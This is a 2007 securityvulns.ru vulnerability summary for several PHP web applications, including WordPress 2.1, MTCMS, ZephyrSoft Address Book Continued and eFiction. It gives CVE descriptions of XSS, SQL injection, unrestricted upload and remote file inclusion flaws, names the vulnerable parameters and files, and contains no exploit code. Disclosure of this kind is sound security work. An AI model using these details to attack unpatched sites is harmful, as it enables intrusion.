Computer Security
[EN] securityvulns.ru no-pyccku


Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
Published:27.02.2007
Source:
SecurityVulns ID:7308
Type:remote
Threat Level:
5/10
Description:PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.
Affected:VIEWCVS : ViewCVS 0.9
 WORDPRESS : WordPress 2.1
 MTCMS : MTCMS 2.2
 ZEPHYRSOFT : Address Book Continued 1.00
 ZEPHYRSOFT : Address Book Continued 1.01
 EFICTION : eFiction 3.1
CVE:CVE-2007-1132 (Multiple cross-site scripting (XSS) vulnerabilities in the "Contact Us" functionality in MTCMS 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) message and (2) title fields.)
 CVE-2007-1129 (Multiple unrestricted file upload vulnerabilities in MTCMS 3.2 allow remote attackers to upload and execute files via (1) an avatar upload in an add_down action, or (2) an add_link action.)
 CVE-2007-1122 (Multiple SQL injection vulnerabilities in Mathis Dirksen-Thedens ZephyrSoft Toolbox Address Book Continued (ABC) 1.00 and 1.01 allow remote attackers to execute arbitrary SQL commands via the id parameter to the (1) updateRow and (2) deleteRow functions in functions.php, a variant of a SQL injection issue that was fixed in 1.01. NOTE: some of these details are obtained from third party information.)
 CVE-2007-1121 (Multiple SQL injection vulnerabilities in Mathis Dirksen-Thedens ZephyrSoft Toolbox Address Book Continued (ABC) 1.00 allow remote attackers to execute arbitrary SQL commands via the id parameter to the (1) updateRow and (2) deleteRow functions in functions.php. NOTE: some of these details are obtained from third party information.)
 CVE-2007-1118 (Multiple PHP remote file inclusion vulnerabilities in eFiction 3.1.1 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the path_to_smf parameter to (1) bridges/SMF/logout.php or (2) get_session_vars.php.)
Original documentdocumentStefan Friedli, Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities (27.02.2007)
 documentScarlet Pimpernel, [Full-disclosure] Multiple SQL Injection bugs in TCS website (27.02.2007)
 documentMoritz Naumann, ViewCVS 0.9.4 issues (27.02.2007)
 documentlaurent gaffié, MTCMS multiple upload vulnerabilities (27.02.2007)
 documentc_r_ck_(at)_hotmail.com, XXS in script Phorum (27.02.2007)
 documentSaMuschie, WordPress AdminPanel CSRF/XSS - 0day (27.02.2007)

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod